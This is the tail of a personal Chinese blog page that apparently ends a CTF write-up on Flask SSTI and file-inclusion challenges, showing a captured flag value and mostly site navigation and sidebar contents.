<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;tr&gt;&lt;td class=&quot;e&quot;&gt;FLAG &lt;/td&gt;&lt;td class=&quot;v&quot;&gt;flag&#123;c78a4c19-ceac-458c-86b8-40dbe83b5a41&#125; &lt;/td&gt;&lt;/tr&gt;</span><br><span class="line">&lt;tr&gt;&lt;td class=&quot;e&quot;&gt;PHP_VERSION &lt;/td&gt;&lt;td class=&quot;v&quot;&gt;</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/01/2022-3-1/" rel="prev" title="2022.3.1">
      <i class="fa fa-chevron-left"></i> 2022.3.1
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/10/2022-3-15/" rel="next" title="2022-3-15">
      2022-3-15 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="MTAyMC81NDU4OS8zMTA2MA=="></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#web-ssti-flask"><span class="nav-number">1.</span> <span class="nav-text">web-ssti-flask</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CSCCTF-2019-Qual-FlaskLight"><span class="nav-number">1.1.</span> <span class="nav-text">[CSCCTF 2019 Qual]FlaskLight</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GYCTF2020-FlaskApp"><span class="nav-number">1.2.</span> <span class="nav-text">[GYCTF2020]FlaskApp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RootersCTF2019-I-lt-3-Flask"><span class="nav-number">1.3.</span> <span class="nav-text">[RootersCTF2019]I_&lt;3_Flask</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pasecactf-2019-flask-ssti-1"><span class="nav-number">1.4.</span> <span class="nav-text">[pasecactf_2019]flask_ssti 1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%951"><span class="nav-number">1.4.1.</span> <span class="nav-text">解法1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%952"><span class="nav-number">1.4.2.</span> <span class="nav-text">解法2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#proc%E7%9B%AE%E5%BD%95"><span class="nav-number">1.4.2.1.</span> <span class="nav-text">&#x2F;proc目录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#cmdline"><span class="nav-number">1.4.2.2.</span> <span class="nav-text">cmdline</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#cwd"><span class="nav-number">1.4.2.3.</span> <span class="nav-text">cwd</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#exe"><span class="nav-number">1.4.2.4.</span> <span class="nav-text">exe</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#enciron"><span class="nav-number">1.4.2.5.</span> <span class="nav-text">enciron</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#fd"><span class="nav-number">1.4.2.6.</span> <span class="nav-text">fd</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#self"><span class="nav-number">1.4.2.7.</span> <span class="nav-text">self</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-number">1.4.2.8.</span> <span class="nav-text">题解</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E7%AB%A0-web%E8%BF%9B%E9%98%B6-SSTI"><span class="nav-number">1.5.</span> <span class="nav-text">[第三章 web进阶]SSTI</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GKCTF-2021-%E7%AD%BE%E5%88%B0"><span class="nav-number">1.6.</span> <span class="nav-text">[GKCTF 2021]签到</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EasyBypass"><span class="nav-number">1.7.</span> <span class="nav-text">EasyBypass</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BA%A2%E6%98%8E%E8%B0%B7CTF-2021-write-shell"><span class="nav-number">1.8.</span> <span class="nav-text">[红明谷CTF 2021]write_shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HFCTF-2021-Final-easyflask-1"><span class="nav-number">1.9.</span> <span class="nav-text">[HFCTF 2021 Final]easyflask 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NPUCTF2020-EZINCLUDE"><span class="nav-number">1.10.</span> <span class="nav-text">NPUCTF2020-EZINCLUDE</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">hanbaiGG</p>
  <div class="site-description" itemprop="description">为什么不拉弟弟一把呢</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Tue Oct 19 2021 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">hanbaiGG</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.8' zIndex='-1' count='300' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  















  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
